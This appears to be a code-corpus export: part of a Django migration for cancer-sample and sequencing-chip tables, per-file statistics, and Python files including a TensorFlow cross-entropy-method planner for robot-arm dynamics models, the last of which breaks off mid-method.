('cancer_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Type')),
('cancer_subtype', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Subtype')),
('disease_condition_health_status', models.CharField(blank=True, max_length=50, null=True, verbose_name='Disease condition/health status')),
('sex', models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Mixed'), ('U', 'Unknown')], max_length=50, null=True, verbose_name='Sex')),
('patient_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Patient biopsy date')),
('anatomic_site', models.CharField(max_length=50, null=True, verbose_name='Anatomic site')),
('anatomic_sub_site', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anatomic sub-site')),
('developmental_stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Developmental stage')),
('tissue_type', models.CharField(choices=[('N', 'Normal'), ('B', 'Benign'), ('PM', 'Pre-malignant'), ('M', 'Malignant'), ('NNP', 'Non-neoplastic Disease'), ('U', 'Undetermined'), ('HP', 'Hyperplasia'), ('MP', 'Metaplasia'), ('DP', 'Dysplasia')], max_length=50, null=True, verbose_name='Tissue type')),
('cell_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell type')),
('pathology_disease_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Pathology/disease name (for diseased samples only)')),
('additional_pathology_info', models.CharField(blank=True, max_length=50, null=True, verbose_name='Additional pathology information')),
('grade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Grade')),
('stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Stage')),
('tumour_content', models.CharField(blank=True, max_length=50, null=True, verbose_name='Tumor content (%)')),
('pathology_occurrence', models.CharField(blank=True, choices=[('PR', 'Primary'), ('RC', 'Recurrent or Relapse'), ('ME', 'Metastatic'), ('RM', 'Remission'), ('UN', 'Undetermined'), ('US', 'Unspecified')], max_length=50, null=True, verbose_name='Pathology occurrence')),
('treatment_status', models.CharField(blank=True, choices=[('PR', 'Pre-treatment'), ('IN', 'In-treatment'), ('PO', 'Post-treatment'), ('NA', 'N/A'), ('UN', 'Unknown')], max_length=50, null=True, verbose_name='Treatment status')),
('family_information', models.CharField(blank=True, max_length=50, null=True, verbose_name='Family information')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='ChipRegion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('region_code', models.CharField(blank=True, max_length=50, null=True, verbose_name='region_code')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='ChipRegionMetadata',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('metadata_value', models.CharField(blank=True, max_length=50, null=True, verbose_name='Metadata value')),
],
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='HistoricalAdditionalSampleInformation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('tissue_state', models.CharField(blank=True, choices=[('NONE', 'None'), ('FROZ', 'Frozen'), ('FRES', 'Fresh'), ('DIG-FRES', 'Digested-Fresh')], default='NONE', max_length=50, null=True, verbose_name='Tissue State')),
('cancer_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Type')),
('cancer_subtype', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cancer Subtype')),
('disease_condition_health_status', models.CharField(blank=True, max_length=50, null=True, verbose_name='Disease condition/health status')),
('sex', models.CharField(blank=True, choices=[('M', 'Male'), ('F', 'Female'), ('X', 'Mixed'), ('U', 'Unknown')], max_length=50, null=True, verbose_name='Sex')),
('patient_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Patient biopsy date')),
('anatomic_site', models.CharField(max_length=50, null=True, verbose_name='Anatomic site')),
('anatomic_sub_site', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anatomic sub-site')),
('developmental_stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Developmental stage')),
('tissue_type', models.CharField(choices=[('N', 'Normal'), ('B', 'Benign'), ('PM', 'Pre-malignant'), ('M', 'Malignant'), ('NNP', 'Non-neoplastic Disease'), ('U', 'Undetermined'), ('HP', 'Hyperplasia'), ('MP', 'Metaplasia'), ('DP', 'Dysplasia')], max_length=50, null=True, verbose_name='Tissue type')),
('cell_type', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell type')),
('pathology_disease_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Pathology/disease name (for diseased samples only)')),
('additional_pathology_info', models.CharField(blank=True, max_length=50, null=True, verbose_name='Additional pathology information')),
('grade', models.CharField(blank=True, max_length=50, null=True, verbose_name='Grade')),
('stage', models.CharField(blank=True, max_length=50, null=True, verbose_name='Stage')),
('tumour_content', models.CharField(blank=True, max_length=50, null=True, verbose_name='Tumor content (%)')),
('pathology_occurrence', models.CharField(blank=True, choices=[('PR', 'Primary'), ('RC', 'Recurrent or Relapse'), ('ME', 'Metastatic'), ('RM', 'Remission'), ('UN', 'Undetermined'), ('US', 'Unspecified')], max_length=50, null=True, verbose_name='Pathology occurrence')),
('treatment_status', models.CharField(blank=True, choices=[('PR', 'Pre-treatment'), ('IN', 'In-treatment'), ('PO', 'Post-treatment'), ('NA', 'N/A'), ('UN', 'Unknown')], max_length=50, null=True, verbose_name='Treatment status')),
('family_information', models.CharField(blank=True, max_length=50, null=True, verbose_name='Family information')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical additional sample information',
'db_table': 'additional_sample_information_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalChipRegion',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('region_code', models.CharField(blank=True, max_length=50, null=True, verbose_name='region_code')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical chip region',
'db_table': 'chip_region_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalChipRegionMetadata',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('metadata_value', models.CharField(blank=True, max_length=50, null=True, verbose_name='Metadata value')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical chip region metadata',
'db_table': 'chip_region_metadata_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalJiraUser',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('username', models.CharField(max_length=150)),
('name', models.CharField(max_length=150)),
('associated_with_dlp', models.BooleanField(default=True)),
('associated_with_tenx', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical jira user',
'db_table': 'jira_user_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalMetadataField',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('field', models.CharField(max_length=50, verbose_name='Metadata key')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical metadata field',
'db_table': 'metadata_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalSample',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('sample_id', models.CharField(max_length=50, null=True, verbose_name='Sample ID')),
('taxonomy_id', models.CharField(blank=True, default='9606', max_length=50, null=True, verbose_name='Taxonomy ID')),
('sample_type', models.CharField(blank=True, choices=[('P', 'Patient'), ('C', 'Cell Line'), ('X', 'Xenograft'), ('Or', 'Organoid'), ('O', 'Other')], max_length=50, null=True, verbose_name='Sample type')),
('anonymous_patient_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anonymous patient ID')),
('cell_line_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell line ID')),
('xenograft_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Xenograft ID')),
('xenograft_recipient_taxonomy_id', models.CharField(blank=True, default='10090', max_length=50, null=True, verbose_name='Xenograft recipient taxonomy ID')),
('xenograft_treatment_status', models.CharField(blank=True, default='', max_length=50, verbose_name='Xenograft treatment status')),
('strain', models.CharField(blank=True, max_length=50, null=True, verbose_name='Strain')),
('xenograft_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Xenograft biopsy date')),
('notes', models.TextField(blank=True, max_length=5000, null=True, verbose_name='Notes')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical sample',
'db_table': 'history_sample',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalSublibraryInformation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('sample', models.CharField(blank=True, max_length=50, null=True, verbose_name='Sample')),
('row', models.IntegerField(blank=True, null=True, verbose_name='Row')),
('column', models.IntegerField(blank=True, null=True, verbose_name='Column')),
('img_col', models.IntegerField(blank=True, null=True, verbose_name='Image Column')),
('file_ch1', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch1')),
('file_ch2', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch2')),
('fld_section', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Section')),
('fld_index', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Index')),
('num_live', models.IntegerField(blank=True, null=True, verbose_name='Num_Live')),
('num_dead', models.IntegerField(blank=True, null=True, verbose_name='Num_Dead')),
('num_other', models.IntegerField(blank=True, null=True, verbose_name='Num_Other')),
('rev_live', models.IntegerField(blank=True, null=True, verbose_name='Rev_Live')),
('rev_dead', models.IntegerField(blank=True, null=True, verbose_name='Rev_Dead')),
('rev_other', models.IntegerField(blank=True, null=True, verbose_name='Rev_Other')),
('condition', models.CharField(blank=True, max_length=50, null=True, verbose_name='experimental_condition')),
('index_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I7')),
('primer_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I7')),
('index_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I5')),
('primer_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I5')),
('pick_met', models.CharField(blank=True, max_length=50, null=True, verbose_name='cell_call')),
('spot_well', models.CharField(blank=True, max_length=50, null=True, verbose_name='Spot_Well')),
('num_drops', models.IntegerField(blank=True, null=True, verbose_name='Num_Drops')),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical sublibrary information',
'db_table': 'sub_library_information_history',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='JiraUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=150)),
('name', models.CharField(max_length=150)),
('associated_with_dlp', models.BooleanField(default=True)),
('associated_with_tenx', models.BooleanField(default=True)),
],
),
migrations.CreateModel(
name='MetadataField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field', models.CharField(max_length=50, verbose_name='Metadata key')),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
],
options={
'ordering': ['name'],
},
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='Sample',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sample_id', models.CharField(max_length=50, null=True, verbose_name='Sample ID')),
('taxonomy_id', models.CharField(blank=True, default='9606', max_length=50, null=True, verbose_name='Taxonomy ID')),
('sample_type', models.CharField(blank=True, choices=[('P', 'Patient'), ('C', 'Cell Line'), ('X', 'Xenograft'), ('Or', 'Organoid'), ('O', 'Other')], max_length=50, null=True, verbose_name='Sample type')),
('anonymous_patient_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Anonymous patient ID')),
('cell_line_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Cell line ID')),
('xenograft_id', models.CharField(blank=True, max_length=50, null=True, verbose_name='Xenograft ID')),
('xenograft_recipient_taxonomy_id', models.CharField(blank=True, default='10090', max_length=50, null=True, verbose_name='Xenograft recipient taxonomy ID')),
('xenograft_treatment_status', models.CharField(blank=True, default='', max_length=50, verbose_name='Xenograft treatment status')),
('strain', models.CharField(blank=True, max_length=50, null=True, verbose_name='Strain')),
('xenograft_biopsy_date', models.DateField(blank=True, null=True, verbose_name='Xenograft biopsy date')),
('notes', models.TextField(blank=True, max_length=5000, null=True, verbose_name='Notes')),
],
options={
'ordering': ['sample_id'],
},
bases=(models.Model, core.helpers.FieldValue),
),
migrations.CreateModel(
name='SublibraryInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sample', models.CharField(blank=True, max_length=50, null=True, verbose_name='Sample')),
('row', models.IntegerField(blank=True, null=True, verbose_name='Row')),
('column', models.IntegerField(blank=True, null=True, verbose_name='Column')),
('img_col', models.IntegerField(blank=True, null=True, verbose_name='Image Column')),
('file_ch1', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch1')),
('file_ch2', models.CharField(blank=True, max_length=50, null=True, verbose_name='File_Ch2')),
('fld_section', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Section')),
('fld_index', models.CharField(blank=True, max_length=50, null=True, verbose_name='Fld_Index')),
('num_live', models.IntegerField(blank=True, null=True, verbose_name='Num_Live')),
('num_dead', models.IntegerField(blank=True, null=True, verbose_name='Num_Dead')),
('num_other', models.IntegerField(blank=True, null=True, verbose_name='Num_Other')),
('rev_live', models.IntegerField(blank=True, null=True, verbose_name='Rev_Live')),
('rev_dead', models.IntegerField(blank=True, null=True, verbose_name='Rev_Dead')),
('rev_other', models.IntegerField(blank=True, null=True, verbose_name='Rev_Other')),
('condition', models.CharField(blank=True, max_length=50, null=True, verbose_name='experimental_condition')),
('index_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I7')),
('primer_i7', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I7')),
('index_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Index_I5')),
('primer_i5', models.CharField(blank=True, max_length=50, null=True, verbose_name='Primer_I5')),
('pick_met', models.CharField(blank=True, max_length=50, null=True, verbose_name='cell_call')),
('spot_well', models.CharField(blank=True, max_length=50, null=True, verbose_name='Spot_Well')),
('num_drops', models.IntegerField(blank=True, null=True, verbose_name='Num_Drops')),
('chip_region', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='core.ChipRegion', verbose_name='Chip_Region')),
],
bases=(models.Model, core.helpers.FieldValue),
),
]
| 76.571875
| 317
| 0.611762
| 2,651
| 24,503
| 5.449264
| 0.087891
| 0.101274
| 0.117334
| 0.139416
| 0.930984
| 0.928838
| 0.926277
| 0.926277
| 0.926277
| 0.904818
| 0
| 0.014669
| 0.223769
| 24,503
| 319
| 318
| 76.811912
| 0.744848
| 0.002816
| 0
| 0.826367
| 1
| 0
| 0.224551
| 0.031354
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016077
| 0
| 0.028939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e2fd9b72303648dae3dfdfa2c4d0a2b7b6a25ffe
| 164
|
py
|
Python
|
src/ctc/protocols/uniswap_v2_utils/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 94
|
2022-02-15T19:34:49.000Z
|
2022-03-26T19:26:22.000Z
|
src/ctc/protocols/uniswap_v2_utils/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-03-03T02:58:47.000Z
|
2022-03-11T18:41:05.000Z
|
src/ctc/protocols/uniswap_v2_utils/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-02-15T17:53:07.000Z
|
2022-03-17T19:14:17.000Z
|
from .uniswap_v2_deltas import *
from .uniswap_v2_events import *
from .uniswap_v2_metadata import *
from .uniswap_v2_spec import *
from .uniswap_v2_state import *
| 27.333333
| 34
| 0.817073
| 25
| 164
| 4.96
| 0.36
| 0.443548
| 0.524194
| 0.612903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0.121951
| 164
| 5
| 35
| 32.8
| 0.826389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3909f9fc72229c5e4f7632df5919c798d9731eae
| 36,253
|
py
|
Python
|
railrl/planner/forward_planner/planner.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
railrl/planner/forward_planner/planner.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
railrl/planner/forward_planner/planner.py
|
fredshentu/public_model_based_controller
|
9301699bc56aa49ba5c699f7d5be299046a8aa0c
|
[
"MIT"
] | null | null | null |
from railrl.data_management.simple_replay_pool import SimpleReplayPool
from railrl.predictors.dynamics_model import FullyConnectedEncoder, InverseModel, ForwardModel
import tensorflow as tf
import time
import numpy as np
from sandbox.rocky.tf.optimizers.penalty_lbfgs_optimizer import PenaltyLbfgsOptimizer
from railrl.misc.pyhelper_fns.vis_utils import MyAnimationMulti
def planner_info(arm_loss, box_loss, forward_models_outputs):
return {'arm_loss':arm_loss, 'box_loss':box_loss, \
'forward_models_outputs': forward_models_outputs}
def gather_cols(params, indices, name=None):
"""Gather columns of a 2D tensor.
Args:
params: A 2D tensor.
indices: A 1D tensor. Must be one of the following types: ``int32``, ``int64``.
name: A name for the operation (optional).
Returns:
A 2D Tensor. Has the same type as ``params``.
"""
with tf.op_scope([params, indices], name, "gather_cols") as scope:
# Check input
params = tf.convert_to_tensor(params, name="params")
indices = tf.convert_to_tensor(indices, name="indices")
try:
params.get_shape().assert_has_rank(2)
except ValueError:
raise ValueError('\'params\' must be 2D.')
try:
indices.get_shape().assert_has_rank(1)
except ValueError:
raise ValueError('\'params\' must be 1D.')
# Define op
p_shape = tf.shape(params)
p_flat = tf.reshape(params, [-1])
i_flat = tf.reshape(tf.reshape(tf.range(0, p_shape[0]) * p_shape[1],
[-1, 1]) + indices, [-1])
return tf.reshape(tf.gather(p_flat, i_flat),
[p_shape[0], -1])
"""
Planner takes two states (S_init and S_goal) and output an action.
Fine Tune is out of the scope of Planner
"""
class Planner(object):
def __init__(
self,
dynamic_model,
encoder,
sess
):
self.encoder = encoder
self.dynamic_model = dynamic_model
self.sess = sess
##initialize the model.....
def get_action(S_init, S_goal):
return None
"""
Inverde_model planner should be easy, just return the action
"""
class InverseModelPlanner(object):
def __init__(
self,
dynamic_model,
env,
encoder,
sess = None,
):
if sess == None:
sess =tf.get_default_session()
self.sess = sess
#re-construct the dynamic model
self.S_init_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
self.S_goal_ph = tf.placeholder(tf.float32, list(env.observation_space.shape))
encoder1 = encoder.get_weight_tied_copy(observation_input=self.S_init_ph)
encoder2 = encoder.get_weight_tied_copy(observation_input=self.S_goal_ph)
self.inverse_model = dynamic_model.get_weight_tied_copy(feature_input1=encoder1.output,
feature_input2=encoder2.output)
def get_action(self, S_init, S_goal):
action = self.sess.run(self.inverse_model.output, feed_dict = \
{self.S_init_ph:S_init, self.S_goal_ph: S_goal})
return action
"""
ForwardModel planner, optimize action according to this objective:
min_{a} (S_next - S_goal)^2
"""
class CEMPlanner_arm_coord():
def __init__(
self,
dynamic_model,
encoder,
env,
sess = None,
max_length = 15,
sample_batch_size = 2000,
top_k = 200,
action_penalty=False,
accumulated_loss = False):
self.sample_batch_size = sample_batch_size
self.top_k = top_k
self.env = env
if sess == None:
sess =tf.get_default_session()
self.sess = sess
self.max_length = max_length
self.action_ph = tf.placeholder(tf.float32, [max_length, None, 4])
self.forward_model_list = []
#build the recurrent model w.t. the max length
self.S_init_ph = tf.placeholder(tf.float32, [None, 24])
self.S_goal_ph = tf.placeholder(tf.float32, [None, 24])
#only two feature encoders
self.encoder1 = encoder.get_weight_tied_copy(observation_input=self.S_init_ph)
self.encoder2 = encoder.get_weight_tied_copy(observation_input=self.S_goal_ph)
forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
action_input=self.action_ph[0])
self.forward_model_list.append(forward_model)
self.forward_model_output_list = [forward_model.output] #for debug purpose only
for i in range(1,max_length):
forward_model = dynamic_model.get_weight_tied_copy(feature_input = forward_model.output,\
action_input = self.action_ph[i])
self.forward_model_list.append(forward_model)
self.forward_model_output_list.append(forward_model.output)
## objective
def transfer_box_global_tf(obs):
arm2box = gather_cols(obs, [4,5])/10.0
return gather_cols(obs, [21,22]) + arm2box
self.objective_list = []
self.arm_loss_list = []
self.box_loss_list = []
self.objective_topk_index_list = []
current_objective = 0
#objective
for forward_model in self.forward_model_list:
if accumulated_loss:
current_objective += tf.reduce_sum(tf.square(transfer_box_global_tf(forward_model.output)-\
transfer_box_global_tf(self.encoder2.output)), axis = 1)
else:
current_objective = tf.reduce_sum(tf.square(transfer_box_global_tf(forward_model.output)-\
transfer_box_global_tf(self.encoder2.output)), axis = 1)
self.objective_list.append(current_objective)
self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
self.box_loss_list.append(tf.reduce_sum(tf.square(transfer_box_global_tf(forward_model.output)-\
transfer_box_global_tf(self.encoder2.output)))*100)
if action_penalty:
for i in range(len(self.objective_list)):
self.objective_list[i] += tf.reduce_sum(tf.square(self.action_ph),axis = [0,2])*0.5
def get_action(self, S_init, S_goal, steps = 1, plot_loss = False, debug = False, stop_variance = 0.2, stop_itr = 3, init_batch_size = 50000):
assert(steps <= self.max_length)
#fit a multivariable Gaussian
mean_list = None
cov_matrix = None
batch_S_init = np.dot(np.ones([init_batch_size, 1]), S_init.reshape(1,-1))
batch_S_goal = np.dot(np.ones([init_batch_size, 1]), S_goal.reshape(1,-1))
#CEM
actions = np.random.rand(self.max_length, init_batch_size, 4)*2 - 1
objective_list = self.sess.run(self.objective_list[steps-1], feed_dict = {self.action_ph:actions, \
self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
sorted_index = np.argsort(objective_list)[:self.top_k]
# debug
# action_pen, objective_debug = self.sess.run([tf.reduce_sum(tf.square(self.action_ph),axis = [0,2])*0.3, self.objective_list[14]], feed_dict = {self.action_ph:actions, \
# self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
# import pdb; pdb.set_trace()
best_actions = actions[:,sorted_index, :]
trans_best_actions = np.moveaxis(best_actions, 0, 1).reshape(self.top_k, -1)
cov_matrix = np.cov(trans_best_actions.T)
mean_list = np.mean(trans_best_actions.T, axis = 1)
batch_S_init = np.dot(np.ones([self.sample_batch_size, 1]), S_init.reshape(1,-1))
batch_S_goal = np.dot(np.ones([self.sample_batch_size, 1]), S_goal.reshape(1,-1))
for i in range(stop_itr-1):
actions = np.random.multivariate_normal(mean_list, cov_matrix, self.sample_batch_size).reshape(self.sample_batch_size, self.max_length, 4)
actions = np.moveaxis(actions, 0,1)
objective_list = self.sess.run(self.objective_list[steps-1], feed_dict = {self.action_ph:actions, \
self.S_init_ph:batch_S_init, self.S_goal_ph:batch_S_goal})
sorted_index = np.argsort(objective_list)[:self.top_k]
best_actions = actions[:,sorted_index, :]
trans_best_actions = np.moveaxis(best_actions, 0, 1).reshape(self.top_k, -1)
cov_matrix = np.cov(trans_best_actions.T)
mean_list = np.mean(trans_best_actions.T, axis = 1)
# import pdb; pdb.set_trace()
#if debug, visualize all forward model's output
best_action = best_actions[:,0,:]
arm_loss, box_loss,forward_models_outputs, final_objective = self.sess.run([self.arm_loss_list[0], self.box_loss_list[0], \
self.forward_model_output_list, self.objective_list[steps-1]], \
{self.action_ph: best_action.reshape(15,1,4), \
self.S_init_ph:[S_init], self.S_goal_ph:[S_goal]})
print("final objective")
print(final_objective)
# import pdb; pdb.set_trace()
return best_actions[0,0], {'arm_loss':arm_loss, 'box_loss':box_loss, 'forward_models_outputs':forward_models_outputs[:steps]}
class CEMPlanner():
def __init__(
self,
dynamic_model,
encoder,
env,
sess = None,
pos_only = True,
max_length = 15,
sample_batch_size = 2000,
top_k = 200,
action_penalty=False,
accumulated_loss = False):
self.sample_batch_size = sample_batch_size
self.top_k = top_k
self.env = env
if sess == None:
sess =tf.get_default_session()
self.sess = sess
self.max_length = max_length
self.action_ph = tf.placeholder(tf.float32, [max_length, None, 4])
self.forward_model_list = []
#build the recurrent model w.t. the max length
self.S_init_ph = tf.placeholder(tf.float32, [None]+list(env.observation_space.shape))
self.S_goal_ph = tf.placeholder(tf.float32, [None]+list(env.observation_space.shape))
#only two feature encoders
self.encoder1 = encoder.get_weight_tied_copy(observation_input=self.S_init_ph)
self.encoder2 = encoder.get_weight_tied_copy(observation_input=self.S_goal_ph)
forward_model = dynamic_model.get_weight_tied_copy(feature_input=self.encoder1.output,
action_input=self.action_ph[0])
self.forward_model_list.append(forward_model)
self.forward_model_output_list = [forward_model.output] #for debug purpose only
for i in range(1,max_length):
forward_model = dynamic_model.get_weight_tied_copy(feature_input = forward_model.output,\
action_input = self.action_ph[i])
self.forward_model_list.append(forward_model)
self.forward_model_output_list.append(forward_model.output)
## objective
self.objective_list = []
self.arm_loss_list = []
self.box_loss_list = []
self.objective_topk_index_list = []
current_objective = 0
if pos_only:
for forward_model in self.forward_model_list:
if accumulated_loss:
current_objective += tf.reduce_sum(tf.square(gather_cols(forward_model.output, [4,5,6])\
- gather_cols(self.encoder2.output, [4,5,6])), axis = 1)
else:
current_objective = tf.reduce_sum(tf.square(gather_cols(forward_model.output, list(range(4,7)))\
- gather_cols(self.encoder2.output, list(range(4,7)))), axis = 1)
self.objective_list.append(current_objective)
self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
else:
for forward_model in self.forward_model_list:
self.objective_list.append(tf.reduce_sum(tf.square(forward_model.output[0] - self.encoder2.output[0])))
self.arm_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][:4] - self.encoder2.output[0][:4])))
self.box_loss_list.append(tf.reduce_sum(tf.square(forward_model.output[0][4:6] - self.encoder2.output[0][4:6])))
if action_penalty:
for i in range(len(self.objective_list)):
self.objective_list[i] += tf.reduce_sum(tf.square(self.action_ph),axis = [0,2])*0.5
def get_action(self, S_init, S_goal, steps = 1, plot_loss = False, debug = False, stop_variance = 0.2, stop_itr = 3, init_batch_size = 50000):
assert(steps <= self.max_length)
#fit a multivariable Gaussian
mean_list = None
cov_matrix = None
